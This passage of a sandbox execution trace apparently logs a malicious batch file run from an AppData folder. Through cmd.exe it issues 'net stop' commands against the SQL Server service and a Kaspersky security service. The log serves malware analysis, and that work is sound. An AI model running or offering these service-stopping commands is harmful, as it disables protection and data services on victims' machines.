returned 0x3e0000 [0043.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0043.838] GetProcessHeap () returned 0x3e0000 [0043.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0043.838] GetProcessHeap () returned 0x3e0000 [0043.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0043.838] GetProcessHeap () returned 0x3e0000 [0043.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0043.838] GetProcessHeap () returned 0x3e0000 [0043.838] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0043.838] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0043.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6f5 [0043.839] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x11cc, lpOverlapped=0x0) returned 1 [0043.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0043.839] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLSERVER /y\r\n ServiceΓÇ¥ /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 25 [0043.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.839] GetFileType (hFile=0x74) returned 0x1 [0043.839] _get_osfhandle (_FileHandle=3) returned 0x74 [0043.839] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0043.839] GetProcessHeap () returned 0x3e0000 [0043.839] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0043.840] _tell (_FileHandle=3) returned 1806 [0043.840] _close (_FileHandle=3) returned 0 [0043.840] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0043.840] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0043.840] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0043.840] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0043.840] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0043.840] _wcsicmp (_String1="net", _String2="CD") returned 11 [0043.840] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0043.840] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0043.840] _wcsicmp (_String1="net", _String2="REN") returned -4 [0043.840] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0043.840] _wcsicmp (_String1="net", _String2="SET") returned -5 [0043.840] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0043.840] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0043.840] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0043.841] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0043.841] _wcsicmp (_String1="net", _String2="MD") returned 1 [0043.841] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0043.841] _wcsicmp (_String1="net", _String2="RD") returned -4 [0043.841] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0043.841] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0043.841] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0043.841] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0043.841] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0043.841] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0043.841] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0043.841] _wcsicmp (_String1="net", _String2="VER") returned -8 [0043.841] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0043.841] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0043.841] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0043.841] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0043.841] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0043.841] _wcsicmp (_String1="net", _String2="START") returned -5 [0043.841] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0043.841] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0043.841] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0043.841] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0043.841] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0043.841] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0043.841] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0043.841] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0043.841] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0043.841] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0043.841] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0043.841] SetErrorMode (uMode=0x0) returned 0x1 [0043.841] GetProcessHeap () returned 0x3e0000 [0043.841] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0043.841] GetProcessHeap () returned 0x3e0000 [0043.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0043.842] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.842] GetProcessHeap () returned 0x3e0000 [0043.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0043.842] GetProcessHeap () returned 0x3e0000 [0043.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0043.842] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0043.842] GetProcessHeap () returned 0x3e0000 [0043.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0043.842] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.842] GetProcessHeap () returned 0x3e0000 [0043.842] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0043.842] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0043.842] GetProcessHeap () returned 0x3e0000 [0043.842] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0043.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.842] GetLastError () returned 0x2 [0043.842] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.842] GetLastError () returned 0x2 [0043.842] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.843] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0043.843] GetLastError () returned 0x2 [0043.843] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0043.843] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0043.843] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.843] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0043.843] SetErrorMode (uMode=0x0) returned 0x1 [0043.843] GetProcessHeap () returned 0x3e0000 [0043.843] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0043.843] GetProcessHeap () returned 0x3e0000 [0043.843] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0043.843] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0043.844] GetProcessHeap () returned 0x3e0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0043.844] GetProcessHeap () returned 0x3e0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0043.844] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0043.844] GetProcessHeap () returned 0x3e0000 [0043.844] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0043.844] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0043.844] GetProcessHeap () returned 0x3e0000 [0043.844] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0043.844] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0043.844] GetProcessHeap () returned 0x3e0000 [0043.844] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0043.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.844] GetLastError () returned 0x2 [0043.844] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.844] GetLastError () returned 0x2 [0043.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0043.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0043.845] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0043.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0043.845] GetLastError () returned 0x2 [0043.845] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0043.845] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0043.845] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0043.845] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0043.845] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0043.845] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0043.846] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0043.846] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLSERVER /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLSERVER /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLSERVER /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x35c, dwThreadId=0x788)) returned 1 [0043.851] CloseHandle (hObject=0x74) returned 1 [0043.851] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0043.851] GetProcessHeap () returned 0x3e0000 [0043.851] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0043.851] GetEnvironmentStringsW () returned 0x3f8408* [0043.851] GetProcessHeap () returned 0x3e0000 [0043.851] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0043.851] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0043.851] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0044.178] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0044.178] CloseHandle (hObject=0x78) returned 1 [0044.178] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0044.178] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0044.178] GetProcessHeap () returned 0x3e0000 [0044.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.178] GetEnvironmentStringsW () returned 0x3f8408* [0044.178] GetProcessHeap () returned 0x3e0000 [0044.178] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.178] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.178] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0044.178] GetProcessHeap () returned 0x3e0000 [0044.178] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.179] GetEnvironmentStringsW () returned 0x3f8408* [0044.179] GetProcessHeap () returned 0x3e0000 [0044.179] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.179] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.179] GetProcessHeap () returned 0x3e0000 [0044.179] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0044.179] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0044.179] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.179] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0044.179] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.179] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0044.179] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.179] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0044.179] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.179] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0044.180] SetConsoleInputExeNameW () returned 0x1 [0044.180] GetConsoleOutputCP () returned 0x1b5 [0044.180] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0044.180] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.180] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0044.180] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0044.180] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.180] SetFilePointer (in: hFile=0x78, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0044.180] GetProcessHeap () returned 0x3e0000 [0044.180] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0044.181] GetProcessHeap () returned 0x3e0000 [0044.181] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0044.181] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.181] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0044.181] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x11b3, lpOverlapped=0x0) returned 1 [0044.181] SetFilePointer (in: hFile=0x78, lDistanceToMove=1825, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x721 [0044.181] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=19, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop KAVFS /y\r\nR /y\r\n ServiceΓÇ¥ /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 19 [0044.181] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.181] GetFileType (hFile=0x78) returned 0x1 [0044.181] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.181] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x721 [0044.191] GetProcessHeap () returned 0x3e0000 [0044.191] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0044.191] GetProcessHeap () returned 0x3e0000 [0044.191] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0044.191] _tell (_FileHandle=3) returned 1825 [0044.191] _close (_FileHandle=3) returned 0 [0044.191] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0044.192] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0044.192] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0044.192] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0044.192] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0044.192] _wcsicmp (_String1="net", _String2="CD") returned 11 [0044.192] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0044.192] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0044.192] _wcsicmp (_String1="net", _String2="REN") returned -4 [0044.192] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0044.192] _wcsicmp (_String1="net", _String2="SET") returned -5 [0044.192] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0044.192] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0044.192] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0044.192] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0044.192] _wcsicmp (_String1="net", _String2="MD") returned 1 [0044.192] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0044.192] _wcsicmp (_String1="net", _String2="RD") returned -4 [0044.192] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0044.192] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0044.192] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0044.192] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0044.192] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0044.192] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0044.192] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0044.192] _wcsicmp (_String1="net", _String2="VER") returned -8 [0044.192] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0044.192] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0044.192] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0044.192] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0044.192] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0044.192] _wcsicmp (_String1="net", _String2="START") returned -5 [0044.192] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0044.192] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0044.192] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0044.192] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0044.192] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0044.192] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0044.193] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0044.193] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0044.193] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0044.193] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0044.193] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0044.193] SetErrorMode (uMode=0x0) returned 0x1 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0044.193] GetProcessHeap () returned 0x3e0000 [0044.193] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, 